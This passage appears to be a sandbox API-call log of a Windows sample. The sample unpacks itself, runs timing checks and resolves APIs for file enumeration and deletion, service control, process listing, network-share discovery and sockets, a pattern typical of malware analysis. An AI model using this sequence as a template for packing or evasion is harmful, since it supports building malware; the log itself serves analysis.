xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xac\x1b\x52\x47\x9c\xfe\x18", lpUsedDefaultChar=0x0) returned 256 [0029.248] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x42b272) returned 0x0 [0029.249] RtlSizeHeap (HeapHandle=0x210000, Flags=0x0, MemoryPointer=0x212a60) returned 0x80 [0029.249] RtlSizeHeap (HeapHandle=0x210000, Flags=0x0, MemoryPointer=0x212a60) returned 0x80 [0029.250] RtlSizeHeap (HeapHandle=0x210000, Flags=0x0, MemoryPointer=0x212a60) returned 0x80 [0029.250] RtlSizeHeap (HeapHandle=0x210000, Flags=0x0, MemoryPointer=0x212a60) returned 0x80 [0029.251] RtlSizeHeap (HeapHandle=0x210000, Flags=0x0, MemoryPointer=0x212a60) returned 0x80 [0029.251] GetTickCount () returned 0x18880 [0029.251] GetTickCount () returned 0x18880 [0029.251] GetTickCount () returned 0x18880 [0029.251] GetTickCount () returned 0x18880 [0029.251] GetTickCount () returned 0x18880 [0029.251] GetTickCount () returned 0x18880 [0029.251] GetTickCount () returned 0x18880 [0029.251] GetTickCount () returned 0x18880 [0029.251] GetTickCount () returned 0x18880 [0029.251] GetTickCount () returned 0x18880 [0029.251] GetTickCount () returned 0x18880 [0029.251] GetTickCount () returned 0x18880 [0029.251] GetTickCount () returned 0x18880 [0029.251] GetTickCount () returned 0x18880 [0029.251] GetTickCount () returned 0x18880 [0029.251] GetTickCount () returned 0x18880 [0029.251] GetTickCount () returned 0x18880 [0029.251] GetTickCount () returned 0x18880 [0029.251] GetTickCount () returned 0x18880 [0029.251] GetTickCount () returned 0x18880 [0029.251] GetTickCount () returned 0x18880 [0029.251] GetTickCount () returned 0x18880 [0029.251] GetTickCount () returned 0x18880 [0029.251] GetTickCount () returned 0x18880 [0029.251] GetTickCount () returned 0x18880 [0029.251] GetTickCount () returned 0x18880 [0029.252] GetTickCount () returned 0x18880 [0029.252] GetTickCount () returned 0x18880 [0029.252] GetTickCount () returned 0x1888f [0029.252] GetTickCount () returned 0x1888f [0029.252] GetTickCount () returned 0x1888f [0029.252] GetTickCount () returned 0x1888f [0029.252] GetTickCount () returned 0x1888f [0029.252] GetTickCount () returned 0x1888f [0029.252] GetTickCount () returned 0x1888f [0029.252] GetTickCount () returned 0x1888f [0029.252] GetTickCount () returned 0x1888f [0029.252] GetTickCount () returned 0x1888f [0029.252] GetTickCount () returned 0x1888f [0029.252] GetTickCount () returned 0x1888f [0029.252] GetTickCount () returned 0x1888f [0029.252] GetTickCount () returned 0x1888f [0029.252] GetTickCount () returned 0x1888f [0029.252] GetTickCount () returned 0x1888f [0029.252] GetTickCount () returned 0x1888f [0029.252] GetTickCount () returned 0x1888f [0029.252] GetTickCount () returned 0x1888f [0029.252] GetTickCount () returned 0x1888f [0029.252] GetTickCount () returned 0x1888f [0029.252] GetTickCount () returned 0x1888f [0029.252] GetTickCount () returned 0x1888f [0029.252] GetTickCount () returned 0x1888f [0029.252] GetTickCount () returned 0x1888f [0029.252] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.253] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.254] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.255] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.256] GetTickCount () returned 0x1888f [0029.257] GetTickCount () returned 0x1888f [0029.257] GetTickCount () returned 0x1888f [0029.257] GetTickCount () returned 0x1888f [0029.348] LocalAlloc (uFlags=0x0, uBytes=0x17e50) returned 0xb220e8 [0029.349] LocalAlloc (uFlags=0x0, uBytes=0x17e50) returned 0xb39f40 [0029.351] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0029.351] GetProcAddress (hModule=0x76c20000, lpProcName="GlobalAlloc") returned 0x76c3588e [0029.353] lstrcpyA (in: lpString1=0x450090, lpString2="Virtual" | out: lpString1="Virtual") returned="Virtual" [0029.353] lstrcatA (in: lpString1="Virtual", lpString2="Protect" | out: lpString1="VirtualProtect") returned="VirtualProtect" [0029.353] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0029.354] VirtualProtect (in: lpAddress=0xb51d98, dwSize=0x11ebc, flNewProtect=0x40, lpflOldProtect=0x18f6c0 | out: lpflOldProtect=0x18f6c0*=0x4) returned 1 [0029.364] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0029.364] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76c20000 [0029.364] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0029.364] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0029.364] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualFree") returned 0x76c3186e [0029.364] GetProcAddress (hModule=0x76c20000, lpProcName="GetVersionExA") returned 0x76c33519 [0029.364] GetProcAddress (hModule=0x76c20000, lpProcName="TerminateProcess") returned 0x76c4d802 [0029.365] GetProcAddress (hModule=0x76c20000, lpProcName="ExitProcess") returned 0x76c37a10 [0029.365] GetProcAddress (hModule=0x76c20000, lpProcName="SetErrorMode") returned 0x76c31b00 [0029.365] SetErrorMode (uMode=0x400) returned 0x0 [0029.365] SetErrorMode (uMode=0x0) returned 0x400 [0029.365] GetVersionExA (in: lpVersionInformation=0x18ee4c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x2, dwPlatformId=0xffffffff, szCSDVersion="s}\x16w") | out: lpVersionInformation=0x18ee4c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0029.365] VirtualAlloc (lpAddress=0x0, dwSize=0x17200, flAllocationType=0x1000, flProtect=0x4) returned 0x220000 [0029.366] VirtualProtect (in: lpAddress=0x400000, dwSize=0x19000, flNewProtect=0x40, lpflOldProtect=0x18fed4 | out: lpflOldProtect=0x18fed4*=0x2) returned 1 [0029.369] VirtualFree (lpAddress=0x220000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0029.369] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76c20000 [0029.370] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0029.370] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0029.370] GetProcAddress (hModule=0x76c20000, lpProcName="WaitForSingleObject") returned 0x76c31136 [0029.370] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76c31916 [0029.370] GetProcAddress (hModule=0x76c20000, lpProcName="LeaveCriticalSection") returned 0x77152270 [0029.370] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0029.370] GetProcAddress (hModule=0x76c20000, lpProcName="EnterCriticalSection") returned 0x771522b0 [0029.370] GetProcAddress (hModule=0x76c20000, lpProcName="ReleaseMutex") returned 0x76c3111e [0029.370] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0029.370] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x74ab0000 [0029.548] GetProcAddress (hModule=0x74ab0000, lpProcName="atexit") returned 0x74acc544 [0029.548] atexit (param_1=0xb526b8) returned 0 [0029.551] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76c20000 [0029.551] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0029.551] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleW") returned 0x76c334b0 [0029.551] GetProcAddress (hModule=0x76c20000, lpProcName="FindNextFileW") returned 0x76c354ee [0029.551] GetProcAddress (hModule=0x76c20000, lpProcName="FindClose") returned 0x76c34442 [0029.551] GetProcAddress (hModule=0x76c20000, lpProcName="MoveFileW") returned 0x76c49af0 [0029.551] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileSizeEx") returned 0x76c359e2 [0029.551] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameW") returned 0x76c34950 [0029.551] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileAttributesW") returned 0x76c31b18 [0029.551] GetProcAddress (hModule=0x76c20000, lpProcName="ExitProcess") returned 0x76c37a10 [0029.552] GetProcAddress (hModule=0x76c20000, lpProcName="GetCommandLineW") returned 0x76c35223 [0029.552] GetProcAddress (hModule=0x76c20000, lpProcName="GetComputerNameW") returned 0x76c3dd0e [0029.552] GetProcAddress (hModule=0x76c20000, lpProcName="GetComputerNameA") returned 0x76c4b6e0 [0029.552] GetProcAddress (hModule=0x76c20000, lpProcName="CreateMutexW") returned 0x76c3424c [0029.552] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenW") returned 0x76c31700 [0029.552] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0029.552] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcess") returned 0x76c31809 [0029.552] GetProcAddress (hModule=0x76c20000, lpProcName="WaitForSingleObject") returned 0x76c31136 [0029.552] GetProcAddress (hModule=0x76c20000, lpProcName="GetLogicalDrives") returned 0x76c35371 [0029.552] GetProcAddress (hModule=0x76c20000, lpProcName="GetTickCount") returned 0x76c3110c [0029.552] GetProcAddress (hModule=0x76c20000, lpProcName="DeleteFileW") returned 0x76c389b3 [0029.552] GetProcAddress (hModule=0x76c20000, lpProcName="WideCharToMultiByte") returned 0x76c3170d [0029.552] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76c31916 [0029.552] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0029.552] GetProcAddress (hModule=0x76c20000, lpProcName="LeaveCriticalSection") returned 0x77152270 [0029.553] GetProcAddress (hModule=0x76c20000, lpProcName="ReadFile") returned 0x76c33ed3 [0029.553] GetProcAddress (hModule=0x76c20000, lpProcName="CreateFileW") returned 0x76c33f5c [0029.553] GetProcAddress (hModule=0x76c20000, lpProcName="OpenMutexW") returned 0x76c35151 [0029.553] GetProcAddress (hModule=0x76c20000, lpProcName="EnterCriticalSection") returned 0x771522b0 [0029.553] GetProcAddress (hModule=0x76c20000, lpProcName="WaitForMultipleObjects") returned 0x76c34220 [0029.553] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpiW") returned 0x76c4d5cd [0029.553] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpiA") returned 0x76c33e8e [0029.553] GetProcAddress (hModule=0x76c20000, lpProcName="DeleteCriticalSection") returned 0x771645f5 [0029.553] GetProcAddress (hModule=0x76c20000, lpProcName="ReleaseMutex") returned 0x76c3111e [0029.553] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0029.553] GetProcAddress (hModule=0x76c20000, lpProcName="GetVersion") returned 0x76c34467 [0029.553] GetProcAddress (hModule=0x76c20000, lpProcName="CreateThread") returned 0x76c334d5 [0029.553] GetProcAddress (hModule=0x76c20000, lpProcName="ExpandEnvironmentStringsW") returned 0x76c34173 [0029.553] GetProcAddress (hModule=0x76c20000, lpProcName="QueryPerformanceCounter") returned 0x76c31725 [0029.553] GetProcAddress (hModule=0x76c20000, lpProcName="QueryPerformanceFrequency") returned 0x76c341f0 [0029.554] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0029.554] GetProcAddress (hModule=0x76c20000, lpProcName="SetFileAttributesW") returned 0x76c4d4f7 [0029.554] GetProcAddress (hModule=0x76c20000, lpProcName="GetVolumeInformationW") returned 0x76c4c860 [0029.554] GetProcAddress (hModule=0x76c20000, lpProcName="WriteFile") returned 0x76c31282 [0029.554] GetProcAddress (hModule=0x76c20000, lpProcName="SetFilePointerEx") returned 0x76c4c807 [0029.554] GetProcAddress (hModule=0x76c20000, lpProcName="SetEndOfFile") returned 0x76c4ce2e [0029.554] GetProcAddress (hModule=0x76c20000, lpProcName="FindFirstFileW") returned 0x76c34435 [0029.554] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0029.554] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0029.554] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0029.554] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0029.554] GetProcAddress (hModule=0x76c20000, lpProcName="CreatePipe") returned 0x76cb415b [0029.554] GetProcAddress (hModule=0x76c20000, lpProcName="SetHandleInformation") returned 0x76c4195c [0029.554] GetProcAddress (hModule=0x76c20000, lpProcName="CreateProcessW") returned 0x76c3103d [0029.554] GetProcAddress (hModule=0x76c20000, lpProcName="CompareStringW") returned 0x76c33bca [0029.555] GetProcAddress (hModule=0x76c20000, lpProcName="CompareStringA") returned 0x76c33c5a [0029.555] GetProcAddress (hModule=0x76c20000, lpProcName="OpenProcess") returned 0x76c31986 [0029.555] GetProcAddress (hModule=0x76c20000, lpProcName="TerminateProcess") returned 0x76c4d802 [0029.555] GetProcAddress (hModule=0x76c20000, lpProcName="GetSystemTime") returned 0x76c35a96 [0029.555] GetProcAddress (hModule=0x76c20000, lpProcName="SystemTimeToFileTime") returned 0x76c35a7e [0029.555] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0029.555] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0029.555] GetProcAddress (hModule=0x76c20000, lpProcName="Process32NextW") returned 0x76c5896c [0029.555] GetProcAddress (hModule=0x76c20000, lpProcName="Process32FirstW") returned 0x76c58baf [0029.555] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x74d40000 [0029.555] GetProcAddress (hModule=0x74d40000, lpProcName="RegOpenKeyExW") returned 0x74d5468d [0029.555] GetProcAddress (hModule=0x74d40000, lpProcName="RegQueryValueExW") returned 0x74d546ad [0029.555] GetProcAddress (hModule=0x74d40000, lpProcName="RegSetValueExW") returned 0x74d514d6 [0029.555] GetProcAddress (hModule=0x74d40000, lpProcName="RegCloseKey") returned 0x74d5469d [0029.555] GetProcAddress (hModule=0x74d40000, lpProcName="OpenProcessToken") returned 0x74d54304 [0029.556] GetProcAddress (hModule=0x74d40000, lpProcName="GetTokenInformation") returned 0x74d5431c [0029.556] GetProcAddress (hModule=0x74d40000, lpProcName="OpenSCManagerW") returned 0x74d4ca64 [0029.556] GetProcAddress (hModule=0x74d40000, lpProcName="OpenServiceW") returned 0x74d4ca4c [0029.556] GetProcAddress (hModule=0x74d40000, lpProcName="CloseServiceHandle") returned 0x74d5369c [0029.556] GetProcAddress (hModule=0x74d40000, lpProcName="ControlService") returned 0x74d67144 [0029.556] GetProcAddress (hModule=0x74d40000, lpProcName="QueryServiceStatus") returned 0x74d52a86 [0029.556] GetProcAddress (hModule=0x74d40000, lpProcName="EnumDependentServicesW") returned 0x74d41e3a [0029.556] GetProcAddress (hModule=0x74d40000, lpProcName="EnumServicesStatusExW") returned 0x74d4b466 [0029.556] LoadLibraryA (lpLibFileName="user32.dll") returned 0x74f40000 [0029.556] GetProcAddress (hModule=0x74f40000, lpProcName="SystemParametersInfoW") returned 0x74f590d3 [0029.556] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0031.458] GetProcAddress (hModule=0x75fd0000, lpProcName="ShellExecuteExW") returned 0x75ff1e46 [0031.458] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0031.458] GetProcAddress (hModule=0x77130000, lpProcName="NtQuerySystemInformation") returned 0x7714fda0 [0031.458] LoadLibraryA (lpLibFileName="mpr.dll") returned 0x74a90000 [0031.554] GetProcAddress (hModule=0x74a90000, lpProcName="WNetCloseEnum") returned 0x74a92dd6 [0031.554] GetProcAddress (hModule=0x74a90000, lpProcName="WNetOpenEnumW") returned 0x74a92f06 [0031.554] GetProcAddress (hModule=0x74a90000, lpProcName="WNetEnumResourceW") returned 0x74a93058 [0031.554] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x75bc0000 [0031.750] GetProcAddress (hModule=0x75bc0000, lpProcName="WSAStartup") returned 0x75bc3ab2 [0031.750] GetProcAddress (hModule=0x75bc0000, lpProcName="socket") returned 0x75bc3eb8 [0031.750] GetProcAddress (hModule=0x75bc0000, lpProcName="send") returned 0x75bc6f01 [0031.750] GetProcAddress (hModule=0x75bc0000, lpProcName="recv") returned 0x75bc6b0e [0031.750] GetProcAddress (hModule=0x75bc0000, lpProcName="connect") returned 0x75bc6bdd [0031.750] GetProcAddress (hModule=0x75bc0000, lpProcName="closesocket") returned 0x75bc3918 [0031.750] GetProcAddress (hModule=0x75bc0000, lpProcName="gethostbyname") returned 0x75bd7673 [0031.751] GetProcAddress (hModule=0x75bc0000, lpProcName="inet_addr") returned 0x75bc311b [0031.751] GetProcAddress (hModule=0x75bc0000, lpProcName="ntohl") returned 0x75bc2d57 [0031.751] GetProcAddress (hModule=0x75bc0000, lpProcName="htonl") returned 0x75bc2d57 [0031.751] GetProcAddress (hModule=0x75bc0000, lpProcName="htons") returned 0x75bc2d8b [0031.751] GetProcessHeap () returned 0xb10000 [0031.751] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x20) returned 0xb6cad0 [0031.751] QueryPerformanceCounter (in: lpPerformanceCount=0x18fd24 | out: lpPerformanceCount=0x18fd24*=15189083542) returned 1 [0031.751] GetTickCount () returned 0x18999 [0031.751] GetCurrentProcessId () returned 0x954 [0031.752] GetTickCount () returned 0x18999 [0031.752] GetTickCount () returned 0x18999 [0031.752] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x20) returned 0xb6caf8 [0031.752] GetVersion () returned 0x1db10106 [0031.752] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x7) returned 0xb69bf0 [0031.752] 